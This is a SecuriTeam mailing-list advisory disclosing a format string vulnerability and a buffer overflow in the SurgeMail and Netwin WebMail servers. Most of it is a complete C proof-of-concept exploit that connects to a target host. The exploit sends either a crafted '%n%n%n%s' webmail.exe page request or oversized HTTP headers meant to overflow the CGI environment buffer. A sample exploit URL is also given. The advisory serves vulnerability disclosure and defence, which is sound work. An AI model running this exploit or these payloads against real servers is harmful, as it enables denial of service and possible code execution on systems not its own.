[NT] SurgeMail 38k4 Format string and Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



SurgeMail 38k4 Format string and Buffer Overflow
------------------------------------------------------------------------


SUMMARY

<http://netwinsite.com/surgemail/> SurgeMail is "a well known commercial
multiplatform mail server which supports many protocols". A format string
and a buffer overflow vulnerability in SurgeMail have been discovered,
these vulnerabilities allow a remote attacker to overflow a buffer and
manipulate the way the product works.

DETAILS

Vulnerable Systems:
* SurgeMail version 38k4
* SurgeMail version 39a
* Netwin's WebMail version 3.1s

Format string in webmail.exe's page command
The CGI used for the handling of the webmail interface (webmail.exe) is
affected by a format string vulnerability in the function which builds the
error message when a wrong page is requested and passes it directly to
lvprintf without the needed format argument:
"TPL: Failed to Locate Template
{c:\surgemail\webmail\panel\%s%s%s%s%s%s.tpl}{2=No such file or
directory}"

Sample URL for exploiting the vulnerability:
http://SERVER/scripts/webmail.exe?page=%n%n%n%s%s%s%s

Buffer overflow in the building of environment strings
A buffer overflow vulnerability is located in the function which handles
the real CGI executables (which must be not confused with the .cgi virtual
files like user.cgi, admin.cgi and so on). When the server receives a HTTP
request for a real CGI (like for example webmail.exe) it uses a buffer of
about 20000 bytes for storing all the environment strings which will be
passed to the called program. The HTTP fields passed by the client in his
request are truncated at 200 bytes for the parameter and 800 for its value
and are added as environment variables (HTTP_parameter=value). The lack of
checks on the size of this environment buffer leads to a buffer-overflow,
anyway although is possible to control some registers code execution is
not certain.

Naturally both the SurgeMail and the swatch (port 7027) processes are
affected by this vulnerability.

Exploit:
/*

by Luigi Auriemma - http://aluigi.org/poc/surgemailz.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define ONESEC 1
#endif

typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;



#define VER "0.1"
#define PORT 80
#define BUFFSZ 0x7fff



int putss(u8 *dst, u8 *src);
int putcc(u8 *dst, int chr, int len);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i,
attack;
u16 port = PORT;
u8 *buff,
*p;

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

setbuf(stdout, NULL);

fputs("\n"
"SurgeMail <= 38k4 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@xxxxxxxxxxxxx\n"
"web: aluigi.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attacks:\n"
" 1 = format string in webmail.exe's page command\n"
" 2 = buffer-overflow in the building of environment
strings\n"
"\n", argv[0], port);
exit(1);
}

attack = atoi(argv[1]);

if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port));

buff = malloc(BUFFSZ);
if(!buff) std_err();

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();

p = buff;
if(attack == 1) {
p += putss(p,
"GET /scripts/webmail.exe?page=%n%n%n%s%s%s%s HTTP/1.0\r\n"
"\r\n");

} else if(attack == 2) {
p += putss(p, "GET /scripts/webmail.exe HTTP/1.0\r\n");
for(i = 0; i < 25; i++) {
p += sprintf(p, "%02d: ", i);
p += putcc(p, 'A', 800);
p += putss(p, "\r\n");
}
p += putss(p, "\r\n");

} else {
printf("\nError: wrong attack number\n");
exit(1);
}

printf("- send malformed data\n");
send(sd, buff, p - buff, 0);
if(!timeout(sd, 3)) recv(sd, buff, BUFFSZ, 0);
close(sd);

printf("- done\n");
free(buff);
return(0);
}



int putss(u8 *dst, u8 *src) {
int len;

len = strlen(src);
memcpy(dst, src, len);
return(len);
}



int putcc(u8 *dst, int chr, int len) {
memset(dst, chr, len);
return(len);
}



int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;

tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}



u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}



#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/surgemailz-adv.txt>
http://aluigi.altervista.org/adv/surgemailz-adv.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages